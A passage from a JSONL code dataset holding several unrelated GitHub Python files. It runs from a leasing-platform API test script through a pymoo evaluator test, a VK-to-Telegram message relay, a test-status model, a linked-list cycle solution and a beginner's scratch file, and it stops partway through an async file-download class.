\"recoveryPrincipalTotalAmt\": None,\n # \"incomeTotalAmt\": None,\n # \"xirrRate\": None,\n # \"xirrPureRate\": None,\n # \"irrRate\": None,\n # \"irrPureRate\": None,\n # \"financeSegmentList\": [],\n # \"repayScheduleList\": []\n # }\n # res = self.api(method='POST', url=url, json=data)\n # return res\n\n '''融资信息'''\n def rentSave(self,projectNo,projTradesId):\n res = self.financeQuery(projectNo,projTradesId)\n id = jsonpath.jsonpath(res,'$..id')[0]\n self.rentCalc(projectNo,projTradesId,id)\n url = 'ifc/api/credit-apply/trades/rentSave'\n data = {\n \"projectNo\": projectNo,\n \"projTradesId\": projTradesId,\n \"id\": id,\n \"rateAppearMode\": \"Implication\",\n \"lprBaseRate\": \"3.65\",\n \"rentRate\": 0.4204,\n \"bpFloatValue\": \"3,838.61\",\n \"preditRentDate\": str(datetime.datetime.now().date()),\n \"financeTerm\": 12,\n \"yearPaymentTimes\": \"12\",\n \"totalPaymentTimes\": \"12\",\n \"financeTotalAmt\": \"1000.00\",\n \"totalBookAmt\": 10000,\n \"financingPaymentDirection\": \"Supplier\",\n \"financingPaymentDirectionName\": \"供应商\",\n \"isExistDownPayment\": 1,\n \"downPaymentCalcMode\": \"FIX_AMOUNT\",\n \"downPaymentRatio\": 0.9,\n \"downPaymentAmt\": 9000,\n \"downPaymentPayDirection\": \"Supplier\",\n \"isExistMargin\": 0,\n \"isExistMarginName\": None,\n \"marginCalcMode\": None,\n \"marginRatio\": None,\n \"marginAmt\": None,\n \"marginDeductMode\": None,\n \"retentionPriceAmt\": \"100.00\",\n \"discountAmt\": None,\n \"firstTermAmt\": None,\n \"rentalMode\": \"Prepay\",\n \"rentalModeName\": None,\n \"rentCalcMode\": \"EquivalentRent\",\n \"rentAmt\": \"100.00\",\n \"quickPaymentAmt\": None,\n \"rentTotalAmt\": None,\n \"interestTotalAmt\": None,\n \"recoveryPrincipalTotalAmt\": None,\n \"incomeTotalAmt\": None,\n \"xirrRate\": None,\n \"xirrPureRate\": None,\n \"irrRate\": None,\n \"irrPureRate\": None,\n \"financeSegmentList\": [],\n \"repayScheduleList\": []\n }\n res = self.api(method='POST', url=url, json=data)\n\n '''评估主体类型'''\n def evaluationSubjectQuery(self,projectNo):\n url = 'ifc/api/risk-info/queryEvaluationSubjectBase'\n data = {\n \"projectNo\": projectNo,\n \"roleType\": \"1\"\n }\n res = self.api(method='POST', url=url, json=data)\n return res\n\n def evaluationSubjectScoreQuery(self,projectNo):\n '''评估主体得分'''\n res_subject = self.evaluationSubjectQuery(projectNo)\n url = 'ifc/api/risk-info/queryEvaluationSubjectScore'\n data = {\n \"projectNo\": projectNo,\n \"evaluationSubjectId\": jsonpath.jsonpath(res_subject,'$..evaluationSubjectId')[0],\n \"evaluationSubjectType\": \"1\"\n }\n res_score = self.api(method='POST', url=url, json=data)\n return res_subject,res_score\n\n '''评估主体保存'''\n def evaluationSubjectSave(self,projectNo):\n res = self.evaluationSubjectScoreQuery(projectNo)\n url = 'ifc/api/risk-info/saveEvaluationSubject'\n data = {\n \"id\": None,\n \"projectNo\": projectNo,\n \"evaluationSubjectId\": jsonpath.jsonpath(res[0],'$..evaluationSubjectId')[0],\n \"evaluationSubjectType\": \"1\",\n \"evaluationSubjectTypeName\": None,\n \"evaluationSubjectName\": None,\n \"generalScore\": None,\n \"scheme\": None,\n \"riskScoreItemMap\": {\n \"depositGt5timesRent6Mon\": 0,\n \"houseProperty\": 0,\n \"loansAndConsume6mGe3\": 0,\n \"businessTeam60AndOverdueRateOver2Percent\": 0,\n \"personDishonestExecutee\": 0\n },\n \"scoreConfigList\": [{\n \"id\": None,\n \"projectNo\": None,\n \"scoreItemCode\": \"houseProperty\",\n \"scoreItemName\": \"房产(单价超1万,且净值覆盖敞口)\",\n \"elementValue\": \"是\",\n \"ratingScore\": 1\n }, {\n \"id\": None,\n \"projectNo\": None,\n \"scoreItemCode\": \"houseProperty\",\n \"scoreItemName\": \"房产(单价超1万,且净值覆盖敞口)\",\n \"elementValue\": \"否\",\n \"ratingScore\": 0\n }, {\n \"id\": None,\n \"projectNo\": None,\n \"scoreItemCode\": \"depositGt5timesRent6Mon\",\n \"scoreItemName\": \"近6个月内日均存款余额大于最高租金5倍\",\n \"elementValue\": \"是\",\n \"ratingScore\": 1\n }, {\n \"id\": None,\n \"projectNo\": None,\n \"scoreItemCode\": \"depositGt5timesRent6Mon\",\n \"scoreItemName\": \"近6个月内日均存款余额大于最高租金5倍\",\n \"elementValue\": \"否\",\n \"ratingScore\": 0\n }, {\n \"id\": None,\n \"projectNo\": None,\n \"scoreItemCode\": \"personDishonestExecutee\",\n \"scoreItemName\": \"当前未决诉讼达20万或2年内曾失信限高等\",\n \"elementValue\": \"是\",\n \"ratingScore\": -1\n }, {\n \"id\": None,\n \"projectNo\": None,\n \"scoreItemCode\": \"personDishonestExecutee\",\n \"scoreItemName\": \"当前未决诉讼达20万或2年内曾失信限高等\",\n \"elementValue\": \"否\",\n \"ratingScore\": 0\n }, {\n \"id\": None,\n \"projectNo\": None,\n \"scoreItemCode\": \"loansAndConsume6mGe3\",\n \"scoreItemName\": \"近六个月小贷、消费类金融查询超3次(含)\",\n \"elementValue\": \"是\",\n \"ratingScore\": -1\n }, {\n \"id\": None,\n \"projectNo\": None,\n \"scoreItemCode\": \"loansAndConsume6mGe3\",\n \"scoreItemName\": \"近六个月小贷、消费类金融查询超3次(含)\",\n \"elementValue\": \"否\",\n \"ratingScore\": 0\n }, {\n \"id\": None,\n \"projectNo\": None,\n \"scoreItemCode\": \"businessTeam60AndOverdueRateOver2Percent\",\n \"scoreItemName\": \"业务团队60+逾期率超2%\",\n \"elementValue\": \"是\",\n \"ratingScore\": -2\n }, {\n \"id\": None,\n \"projectNo\": None,\n \"scoreItemCode\": \"businessTeam60AndOverdueRateOver2Percent\",\n \"scoreItemName\": \"业务团队60+逾期率超2%\",\n \"elementValue\": \"否\",\n \"ratingScore\": 0\n }],\n \"scoreItemVMList\": jsonpath.jsonpath(res[1],'$..scoreItemVMList')[0]\n }\n res = self.api(method='POST', url=url, json=data)\n\n '''授信要素查询'''\n def creditElementQuery(self,projectNo):\n url = 'ifc/api/risk-info/queryCreditElement'\n data = {\n \"projectNo\": projectNo\n }\n res = self.api(method='POST', url=url, json=data)\n return res\n\n '''授信归属公司查询'''\n def queryEnterpriseByproject(self,projectNo):\n url = 'ifc/api/proj_cust_enterprise_related_info/queryEnterpriseByProjectNoAndRoleType'\n data = {\n \"projectNo\": projectNo\n }\n res = self.api(method='POST', url=url, json=data)\n return res\n\n '''授信要素'''\n def creditElementSave(self,projectNo):\n res = self.queryEnterpriseByproject(projectNo)\n url = 'ifc/api/risk-info/saveCreditElement'\n data ={\n \"projectNo\": projectNo,\n \"custRelatedList\": [],\n \"shareholderStructureList\": [],\n \"projCustEnterpriseIncomeVerification\": {\n \"id\": None,\n \"confirmableIncome\": \"10\",\n \"currentYearIncome\": \"10.00\",\n \"previousYearIncome\": \"10.00\",\n \"projectNo\": None\n },\n \"bankStatementList\": [],\n \"electricChargeList\": [{\n \"billDate\": \"2023-08\",\n \"billAmount\": \"10.00\"\n }, {\n \"billDate\": \"2023-07\",\n \"billAmount\": \"10.00\"\n }, {\n \"billDate\": \"2023-06\",\n \"billAmount\": \"10.00\"\n }, {\n \"billDate\": \"2023-05\",\n \"billAmount\": \"10.00\"\n }, {\n \"billDate\": \"2023-04\",\n \"billAmount\": \"10.00\"\n }, {\n \"billDate\": \"2023-03\",\n \"billAmount\": \"10.00\"\n }],\n \"rigidLiabilityList\": [{\n \"customerType\": \"1\",\n \"liabilityType\": \"BankLoan\",\n \"belongingCompanyId\": jsonpath.jsonpath(res,'$..id')[0],\n \"rigidLiabilityAmount\": \"100.00\",\n \"mortgageLiabilityAmount\": \"100.00\"\n }],\n \"totalAmount\": 800,\n \"recentElecDate\": \"2023-08\"\n }\n res = self.api(method='POST', url=url, json=data)\n\n '''准入要求'''\n def accessRquirementSave(self,projectNo):\n url = 'ifc/api/risk-info/saveAccessRequirement'\n data = {\n \"projectNo\": projectNo,\n \"list\": [{\n \"accessItemCode\": \"\",\n \"arSubTypeName\": \"其他\",\n \"arDesc\": \"其他\",\n \"comment\": \"其他备注\",\n \"projectNo\": projectNo,\n \"arCode\": \"ar6\",\n \"arSubCode\": \"arSub16\"\n }]\n }\n res = self.api(method='POST', url=url, json=data)\n\n '''影像信息'''\n def attachmentSave(self,projectNo,fileId,fileName,subCategoryCode):\n url = 'ifc/api/attachment/saveFileRelation'\n data = {\n \"fileId\": fileId,\n \"fileName\": fileName,\n \"subCategoryCode\": subCategoryCode,\n \"isUpdate\": False,\n \"code\": \"projectCreditApproval\",\n \"businessKey\": projectNo,\n \"businessType\": \"PROJECT\"\n }\n res = self.api(method='POST', url=url, json=data)\n\n '''影像信息下一步校验'''\n def attachmentNextStep(self,projectNo):\n url = 'ifc/api/attachment/nextStep'\n data = {\n \"businessKey\": projectNo,\n \"templateCode\": \"projectCreditApproval\"\n }\n res = self.api(method='POST', url=url, json=data)\n\n '''补充资料'''\n def reqTextSave(self,projectNo):\n url = 'ifc/api/risk-info/saveReqTextItem'\n data = {\n \"partnerInfoList\": [],\n \"workshopType\": \"1\",\n \"isExistEstate\": 0,\n \"estateInfoCommand\": {\n \"estateNum\": \"\",\n \"isExistMortgage\": 1,\n \"marketValueApprox\": \"\",\n \"netValue\": \"\",\n \"estateBelonger\": \"\"\n },\n \"workshopInfoVm\": {\n \"landArea\": \"100\",\n \"floorArea\": \"100\",\n \"marketValueApprox\": \"100\",\n \"leaseTerm\": \"\",\n \"yearlyRental\": \"\"\n },\n \"entIncomeScaleApprox\": \"100\",\n \"entIncomeScaleApproxLy\": \"100\",\n \"fluctuationCause\": \"说明原因\",\n \"equipmentName\": \"设备名称\",\n \"equipmentTotal\": \"10\",\n \"stageEquipmentTotal\": \"10\",\n \"projAdvantage\": \"项目优势\",\n \"projDisadvantage\": \"项目劣势\",\n \"abnormalSlowReleaseCondition\": \"缓释条件\",\n \"supplementaryContent\": \"其他补充\",\n \"projectNo\": projectNo\n }\n res = self.api(method='POST', url=url, json=data)\n\n def detectorExec(self,itemCode,taskid,detectorCode):\n url = 'ifc/api/common/detector/exec'\n data = {\n \"detectorCode\": detectorCode,\n \"itemCode\": itemCode,\n \"taskId\": taskid\n }\n res = self.api(method='POST', url=url, json=data)\n\n def todoListApp(self):\n '''审批列表'''\n url = 'bpm/api/v2/cmapp-filter/mytask/todo-list?channel=appstore&os=ios&page=0&size=20&timeString=1692588472.32&version=1.1.4'\n res = self.api(method='GET', url=url)\n return res\n\n def todoListPc(self):\n url = 'bpm/api/v2/mytask/todo-list?page=0&size=50&sort='\n res = self.api(method='GET', url=url)\n return res\n\n def getPcTask(self,projectNo):\n res = self.todoListPc()\n for i in res[\"content\"]:\n if i[\"businessKey\"] == projectNo:\n taskid = i[\"id\"]\n break;\n return taskid\n\n def completeInit(self,taskId):\n url = 'ifc/api/flow/task-complete/init?taskId=%s'%taskId\n res = self.api(method='GET', url=url)\n return res\n\n def result(self,start_time,projectNo):\n end_time = time.time()\n run_time = round(end_time - start_time, 2)\n result = {\n \"code\": 200,\n \"status\": True,\n \"message\": 'success,耗时%ss,打开app项目列表查看新建项目!!!' % run_time,\n \"data\": \"项目编号:%s\" % projectNo\n }\n return result\n","repo_name":"jixiaowei1030/jixiaowei","sub_path":"leaseYXZ500/Z500/tools/xiaoWeiNew.py","file_name":"xiaoWeiNew.py","file_ext":"py","file_size_in_byte":76244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9357026440","text":"import unittest\n\nimport numpy as np\n\nfrom pymoo.factory import get_problem\nfrom pymoo.model.evaluator import Evaluator\nfrom pymoo.model.individual import Individual\nfrom pymoo.model.population import Population\n\nproblem = get_problem(\"Rastrigin\")\n\nX = np.random.random((100, problem.n_var))\n\nF = problem.evaluate(X, return_values_of=[\"F\"])\n\nclass EvaluatorTest(unittest.TestCase):\n\n def test_evaluate_array(self):\n evaluator = Evaluator(evaluate_values_of=[\"F\", \"CV\"])\n _F, _CV = evaluator.eval(problem, X)\n np.testing.assert_allclose(F, _F)\n self.assertTrue(evaluator.n_eval == len(X))\n\n def test_evaluate_array_single(self):\n evaluator = Evaluator(evaluate_values_of=[\"F\", \"CV\"])\n _F, _CV = evaluator.eval(problem, X[0])\n np.testing.assert_allclose(F[0], _F)\n self.assertTrue(evaluator.n_eval == 1)\n\n def test_evaluate_individual(self):\n evaluator = Evaluator()\n ind = evaluator.eval(problem, Individual(X=X[0]))\n np.testing.assert_allclose(F[0], ind.get(\"F\"))\n self.assertTrue(evaluator.n_eval == 1)\n\n def test_evaluate_pop(self):\n evaluator = Evaluator()\n pop = Population().new(\"X\", X)\n evaluator.eval(problem, pop)\n np.testing.assert_allclose(F, pop.get(\"F\"))\n self.assertTrue(evaluator.n_eval == len(X))\n\n def test_preevaluated(self):\n evaluator = Evaluator()\n pop = Population().new(\"X\", X)\n evaluator.eval(problem, pop)\n\n pop[range(30)].set(\"F\", None)\n\n evaluator = Evaluator()\n evaluator.eval(problem, pop)\n\n np.testing.assert_allclose(F, pop.get(\"F\"))\n self.assertTrue(evaluator.n_eval == 30)\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"AIasd/ADFuzz","sub_path":"pymoo/tests/problems/test_evaluator.py","file_name":"test_evaluator.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"37643810207","text":"import time\nfrom telebot.util import smart_split\n\n\nclass Queue:\n in_vk_peer_id = None\n out_tg_chat_id = None\n tg = None\n\n def __init__(self, in_vk_peer_id, out_tg_chat_id, tg):\n self.in_vk_peer_id = in_vk_peer_id\n self.out_tg_chat_id = out_tg_chat_id\n self.tg = tg\n\n def on_in_message(self, event):\n if event.peer_id != self.in_vk_peer_id:\n return\n\n text = event._process_message(event)\n\n # sometimes telegram fails, so try until successful\n while True:\n try:\n for x in smart_split(text):\n self.tg.send_message(chat_id=self.out_tg_chat_id, text=x)\n break\n except Exception as e:\n print(\"tg send_message exception:\")\n print(e)\n time.sleep(5)\n continue\n\n # log separator between events\n print()\n","repo_name":"UnkwUsr/vk-tg-suckling-user-bot","sub_path":"msg_queue.py","file_name":"msg_queue.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36131570282","text":"import datetime\nimport bson\n\nfrom . import Base\nfrom .Test import Test\nfrom .TestType import TestType\nfrom .Index import Index\nfrom .CoreObject import CoreObject\n\n\nSTATUSES = ['SUCCESS', 'FAILURE', 'UNKNOWN', 'CUSTOM', 'DEPRECATED']\n\n\nclass Status(CoreObject):\n collection = 'status'\n _test_id = 'test_id'\n _type = 'type'\n _on = 'on'\n _status = 'status'\n _details = 'details'\n _last = 'last'\n _id = '_id'\n\n\n def __init__(self, test_id=None, test_type=None, status=None, on=None, # pylint: disable=too-many-arguments\n details=None, last=None, base_id=None):\n super(Status, self).__init__()\n self._test_id = test_id\n self._type = test_type\n self._on = on\n self._status = status\n self._details = details\n self._last = last\n self._id = base_id\n\n def __repr__(self):\n return ''\\\n .format(self._test_id, self._type, self._status, self._on)\n\n def to_dict(self):\n dict_of_self = super(Status, self).to_dict()\n if self._on is not None:\n dict_of_self[Status._on] = self._on.replace(microsecond=0)\n return dict_of_self\n\n @classmethod\n def from_dict(cls, status_dict):\n status = super(Status, cls).from_dict(status_dict)\n if Status._id in status_dict:\n status._id = str(status_dict[Status._id])\n return status\n\n @staticmethod\n def list(query_filter=None, sort=None, page=None, nb_item=None):\n return Status.get_all(query_filter, sort, page, nb_item)\n\n def save(self):\n Test(test_id=self._test_id, test_type=self._type).save()\n TestType.from_status(self).save()\n Index.index(self)\n self._on = datetime.datetime.now()\n if self._status not in STATUSES:\n if self._details is None:\n self._details = {}\n if 'original_status' not in self._details:\n self._details['original_status'] = self._status\n self._status = 'CUSTOM'\n self._id = str(Base.Base().insert(self.collection, self.to_dict()))\n\n def get_last(self):\n Test(test_id=self._test_id).save()\n query_filter = self.to_dict()\n query_filter[Status._last] = True\n res = Base.Base().get_one(self.collection, query_filter)\n return Status.from_dict(res) if res is not None else None\n\n def get(self):\n query_filter = self.to_dict()\n res = Base.Base().get_one(self.collection, query_filter)\n return Status.from_dict(res) if res is not None else None\n\n def update_last(self):\n Base.Base().update(self.collection, {Status._test_id: self._test_id, Status._last: True},\n {Status._last: False})\n\n def save_and_update(self):\n self.update_last()\n self._last = True\n self.save()\n\n def remove(self):\n Base.Base().remove_by_id(self.collection, bson.ObjectId(self._id))\n\n def should_i_run(self, run_type='default'):\n test_type = TestType.get_one(TestType.from_status(self).to_dict())\n run = test_type.run(run_type)\n if run is None:\n return None\n condition = run['condition']\n modifier = run['modifier']\n status_list = Status.list({Status._test_id: self._test_id})\n status_list_filtered = condition.check_statuses(status_list)\n if modifier == 'ANY':\n return len(status_list_filtered) != 0\n if modifier == 'ALL':\n return len(status_list_filtered) == len(status_list)\n\n def purge(self):\n test_type = TestType.get_one(TestType.from_status(self).to_dict())\n if test_type is None:\n return {'nb_removed': 0}\n run = test_type.purge()\n condition = run['condition']\n action = run['action']\n status_list = Status.list({Status._test_id: self._test_id})\n status_list_filtered = condition.check_statuses(status_list)\n if action == 'REMOVE':\n for status in status_list_filtered:\n status.remove()\n return {'nb_removed': len(status_list_filtered)}\n\n def add_unknown_if_none_exist(self):\n last = self.get_last()\n if last is None:\n self._last = True\n self._status = 'UNKNOWN'\n self._on = datetime.datetime.now()\n self._id = str(Base.Base().insert(self.collection, self.to_dict()))\n","repo_name":"mockersf/TestSheriff","sub_path":"TestSheriff/core/Status.py","file_name":"Status.py","file_ext":"py","file_size_in_byte":4435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3511231418","text":"# Given head, the head of a linked list, determine if the linked list has a cycle in it.\n\nclass Solution:\n def hasCycle(self, head: Optional[ListNode]) -> bool:\n if head is None:\n return False\n \n slow = head \n fast = head.next\n \n while fast != slow:\n if fast is None or fast.next is None:\n return False\n slow = slow.next \n fast = fast.next.next\n \n return True","repo_name":"Annaliskirwa/_Linked_Lists","sub_path":"LinkedListCycle.py","file_name":"LinkedListCycle.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20735505821","text":"# input_x = input(\"Nhap du lieu: \")\n# print(f\"gia tri vua nhap:{input_x}\")\n\nprint(\"yahoo!\" if 3 > 4 else \"shit!\")\n\nli = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nli.append(\"a\")\nli.append(\"b\")\nprint(li)\nli.pop(1)\ndel li[1]\nli.remove(\"a\")\nli2 = li[:]\nli.insert(1, 34)\nli = li + li2\nprint(li)\nprint(len(li))\nt = (1, 2, 3, \"a\")\n\na, b, c = (1, 2, 3)\na=2\nprint(a)\n# kieu du lieu tu dien\n\ndic ={\"one\":1,\"two\":2,\"three\":3}\n\n\ndic.setdefault(\"five\",5)\ndic.update({\"four\":4})\nprint(dic.values())\ndic.setdefault(\"five\",6)\ndic[\"seven\"]=7\ndel dic[\"one\"]\nprint(dic)\n\n# kieu tap hop set\nse = {1,1,2,2,3,4}\n\nse2 = {2,3,4,5}\nprint(se | se2)\nprint(se-se2)\nprint(se^se2)\nprint(se>=se2)\nprint(2 in se)\n\n# LUONG DIEU KHIEN VA KIEU KHA LAP\n\nx_dic = dic.keys()\n#for i in x_dic:\n# print(i),","repo_name":"tiepnv281/HelloWorld","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28507249375","text":"import asyncio\nimport concurrent.futures\nimport datetime\nimport logging\nimport os\nimport random\nfrom typing import Callable, Union\n\nimport async_files\nimport httpcore\nimport httpx\nimport humanize\n\nimport aiodown\nfrom aiodown.errors import FinishedError, PausedError, ProgressError\n\nlog = logging.getLogger(__name__)\n\n\nclass Download:\n def __init__(\n self,\n url: str,\n path: str = None,\n retries: int = 3,\n client: \"aiodown.Client\" = None,\n workers: int = 8,\n ):\n self._client = client\n self._workers = workers\n\n self._id = random.randint(1, 9999)\n self._url = url\n self._path = os.path.dirname(path) if path else None\n self._name = os.path.basename(path) if path else os.path.basename(url)\n self._start = 0\n self._status = \"ready\"\n self._retries = retries\n self._attempts = 0\n self._bytes_total = 0\n self._bytes_downloaded = 0\n\n self._loop = asyncio.get_event_loop()\n self._task = asyncio.ensure_future(self._request())\n\n async def _request(self):\n \"\"\"This is where the magic happens, everything is downloaded here.\n\n Raises:\n FileExistsError: In case the download location already exists.\n \"\"\"\n\n if self.get_status() in [\"reconnecting\", \"started\"]:\n if not self._path:\n self._path = f\"./downloads/{random.randint(1000, 9999)}\"\n\n if not os.path.exists(self._path):\n os.makedirs(self._path)\n\n path = os.path.join(self._path, self._name)\n if not self.get_status() == \"reconnecting\":\n if os.path.exists(path):\n raise FileExistsError(f\"[Errno 17] File exists: '{path}'\")\n self._status = \"downloading\"\n\n try:\n async with httpx.AsyncClient(\n http2=True, follow_redirects=True\n ) as client:\n async with client.stream(\"GET\", self._url) as response:\n assert response.status_code == 200\n\n self._bytes_total = int(response.headers[\"Content-Length\"])\n\n async with async_files.FileIO(path, \"wb\") as file:\n async for chunk in response.aiter_bytes():\n if self.get_status() == \"stopped\":\n break\n if self.get_status() == \"paused\":\n while self.get_status() == \"paused\":\n await asyncio.sleep(0.1)\n continue\n\n bytes_downloaded = response.num_bytes_downloaded\n if self.get_status() == \"reconnecting\":\n if bytes_downloaded < self.get_size_downloaded():\n continue\n else:\n self._attempts = 0\n self._status = \"downloading\"\n\n if bytes_downloaded > 0:\n await file.write(chunk)\n self._bytes_downloaded = bytes_downloaded\n\n if not self.get_status() == \"stopped\":\n self._status = \"finished\"\n log.info(f\"{self.get_file_name()} finished!\")\n if self._client is not None:\n self._client.check_is_running()\n await file.close()\n await client.aclose()\n except (\n AssertionError,\n httpx.CloseError,\n httpcore.ConnectError,\n httpx.ConnectError,\n httpx.RemoteProtocolError,\n KeyError,\n ):\n log.info(f\"{self.get_file_name()} connection failed!\")\n self._status = \"reconnecting\"\n log.info(f\"{self.get_file_name()} retrying!\")\n if self.get_attempts() < self.get_retries():\n await asyncio.sleep(3)\n self._attempts += 1\n await self._request()\n else:\n self._status = \"failed\"\n log.info(\n f\"{self.get_file_name()} reached the limit of {self.get_retries()} attempts!\"\n )\n except BaseException:\n self._status = \"failed\"\n log.info(f\"{self.get_file_name()} failed!\")\n if self._client is not None:\n self._client.check_is_running()\n\n async def start(self):\n \"\"\"Starts the download if it has not already been.\n\n Raises:\n RuntimeError: If the download has already started.\n :obj:`aiodown.errors.ProgressError`: If the download is in progress.\n \"\"\"\n\n if self.get_status() == \"started\":\n raise RuntimeError(\"Download is already started\")\n if not self.is_finished():\n raise ProgressError()\n\n self._status = \"started\"\n self._start = datetime.datetime.now()\n pool = concurrent.futures.ThreadPoolExecutor(max_workers=self._workers)\n future = self._loop.run_in_executor(pool, self._task, self.get_id())\n await asyncio.gather(future, return_exceptions=True)\n\n log.info(f\"{self.get_file_name()} started!\")\n\n async def stop(self):\n \"\"\"Stop download if started.\n\n Raises:\n :obj:`aiodown.errors.FinishedError`: In case the download has already been completed.\n RuntimeError: If the download has already stopped.\n \"\"\"\n\n if self.is_finished():\n raise FinishedError()\n if self.get_status() == \"stopped\":\n raise RuntimeError(\"Download is already stopped\")\n\n self._status = \"stopped\"\n if not self._task.cancelled():\n self._task.cancel()\n if self._client is not None:\n self._client.check_is_running()\n\n log.info(f\"{self.get_file_name()} stopped!\")\n\n async def pause(self):\n \"\"\"Pauses the download if it is in progress.\n\n Raises:\n :obj:`aiodown.errors.FinishedError`: In case the download has already been completed.\n :obj:`aiodown.errors.PausedError`: In case the download is already paused.\n \"\"\"\n\n if self.is_finished():\n raise FinishedError()\n if self.get_status() == \"paused\":\n raise PausedError()\n\n self._status = \"paused\"\n\n log.info(f\"{self.get_file_name()} paused!\")\n\n async def resume(self):\n \"\"\"Resume download if paused.\n\n Raises:\n :obj:`aiodown.errors.FinishedError`: In case the download has already been completed.\n :obj:`aiodown.errors.ProgressError`: In case download is not paused.\n \"\"\"\n\n if self.is_finished():\n raise FinishedError()\n if self.get_status() != \"paused\":\n raise ProgressError()\n\n self._status = \"downloading\"\n\n log.info(f\"{self.get_file_name()} resumed!\")\n\n def get_size_total(\n self, human: bool = False, binary: bool = False, gnu: bool = False\n ) -> Union[int, str]:\n \"\"\"Get the total number of bytes.\n\n Parameters:\n human (``bool``, *optional*):\n If True, it will return the bytes in a format for human understanding,\n if False, it will return only the bytes in numbers.\n\n binary (``bool``, *optional*):\n If True, it will return the bytes in a format for human understanding in binary mode,\n if False, it will return only in human understanding format.\n ``human`` required.\n\n gnu (``bool``, *optional*):\n If True, it will return the bytes in a format for human understanding in gnu mode,\n if False, it will return only in human understanding format.\n ``human`` required.\n\n Raises:\n TypeError: In case of using binary or gnu mode without human mode.\n TypeError: If you try to use binary and gnu mode at the same time.\n\n Returns:\n ``int``: If human mode is disabled.\n ``str``: If human mode is enabled.\n \"\"\"\n\n size = self._bytes_total\n\n return self._human_binary(binary, gnu, human, size)\n\n def get_size_downloaded(\n self, human: bool = False, binary: bool = False, gnu: bool = False\n ) -> Union[int, str]:\n \"\"\"Get the downloaded number of bytes.\n\n Parameters:\n human (``bool``, *optional*):\n If True, it will return the bytes in a format for human understanding,\n if False, it will return only the bytes in numbers.\n\n binary (``bool``, *optional*):\n If True, it will return the bytes in a format for human understanding in binary mode,\n if False, it will return only in human understanding format.\n ``human`` required.\n\n gnu (``bool``, *optional*):\n If True, it will return the bytes in a format for human understanding in gnu mode,\n if False, it will return only in human understanding format.\n ``human`` required.\n\n Raises:\n TypeError: In case of using binary or gnu mode without human mode.\n TypeError: If you try to use binary and gnu mode at the same time.\n\n Returns:\n ``int``: If human mode is disabled.\n ``str``: If human mode is enabled.\n \"\"\"\n\n size = self._bytes_downloaded\n\n return self._human_binary(binary, gnu, human, size)\n\n def get_progress(self) -> float:\n \"\"\"Get the current progress.\n\n Returns:\n ``float``: The current progress of the download.\n \"\"\"\n\n try:\n progress = float(\n f\"{self.get_size_downloaded() / self.get_size_total() * 100:.1f}\"\n )\n except ZeroDivisionError:\n progress = 0\n return progress\n\n def get_id(self) -> int:\n \"\"\"Get the download id.\n\n Returns:\n ``int``: The download id.\n \"\"\"\n\n return self._id\n\n def get_url(self) -> str:\n \"\"\"Get the download URL.\n\n Returns:\n ``str``: The download URL.\n \"\"\"\n\n return self._url\n\n def get_status(self) -> str:\n \"\"\"Get the download status.\n\n Returns:\n ``str``: The download status.\n \"\"\"\n\n return self._status\n\n def get_retries(self) -> int:\n \"\"\"Get the download retries.\n\n Returns:\n ``int``: The download retries.\n \"\"\"\n\n return self._retries\n\n def get_attempts(self) -> int:\n \"\"\"Get the download attempts.\n\n Returns:\n ``int``: The download attempts.\n \"\"\"\n\n return self._attempts\n\n def get_file_path(self) -> str:\n \"\"\"Get the download location.\n\n Returns:\n ``str``: The download location.\n \"\"\"\n\n return self._path\n\n def get_file_name(self) -> str:\n \"\"\"Get the download file name.\n\n Returns:\n ``str``: The download file name.\n \"\"\"\n\n return self._name\n\n def get_start_time(\n self, human: bool = False, precise: bool = False\n ) -> Union[int, str]:\n time = self._start\n\n return self._human_precise(precise, human, time)\n\n def get_elapsed_time(\n self, human: bool = False, precise: bool = False\n ) -> Union[int, str]:\n \"\"\"Get the elapsed time bytes.\n\n Parameters:\n human (``bool``, *optional*):\n If True, it will return the bytes in a format for human understanding,\n if False, it will return only the bytes in numbers.\n\n precise (``bool``, *optional*):\n If True, it will return you want the precise time.\n if False, it will return only in human understanding format.\n ``human`` required.\n\n Raises:\n TypeError: In case of using precise mode without human mode.\n\n Returns:\n ``int``: If human mode is disabled.\n ``str``: If human mode is enabled.\n \"\"\"\n\n time = datetime.datetime.now() - self.get_start_time()\n\n return self._human_precise(precise, human, time)\n\n def get_speed(\n self, human: bool = False, binary: bool = False, gnu: bool = False\n ) -> Union[int, str]:\n \"\"\"Get the download speed bytes.\n\n Parameters:\n human (``bool``, *optional*):\n If True, it will return the bytes in a format for human understanding,\n if False, it will return only the bytes in numbers.\n\n binary (``bool``, *optional*):\n If True, it will return the bytes in a format for human understanding in binary mode,\n if False, it will return only in human understanding format.\n ``human`` required.\n\n gnu (``bool``, *optional*):\n If True, it will return the bytes in a format for human understanding in gnu mode,\n if False, it will return only in human understanding format.\n ``human`` required.\n\n Raises:\n TypeError: In case of using binary or gnu mode without human mode.\n TypeError: If you try to use binary and gnu mode at the same time.\n\n Returns:\n ``int``: If human mode is disabled.\n ``str``: If human mode is enabled.\n \"\"\"\n\n speed = self.get_size_downloaded() / (\n (datetime.datetime.now() - self._start).seconds + 1\n )\n\n return self._human_binary(binary, gnu, human, speed)\n\n def _human_binary(self, binary, gnu, human, arg3):\n if (binary or gnu) and not human:\n raise TypeError(\n \"For 'binary' or 'gnu' type you need to activate human size\"\n )\n if binary and gnu:\n raise TypeError(\n \"You can only choose one type, 'binary' or 'gnu' and not both at the same time\"\n )\n\n if human:\n return humanize.naturalsize(arg3, binary=binary, gnu=gnu)\n return arg3\n\n def get_eta(self, human: bool = False, precise: bool = False) -> Union[int, str]:\n \"\"\"Get the eta time bytes.\n\n Parameters:\n human (``bool``, *optional*):\n If True, it will return the bytes in a format for human understanding,\n if 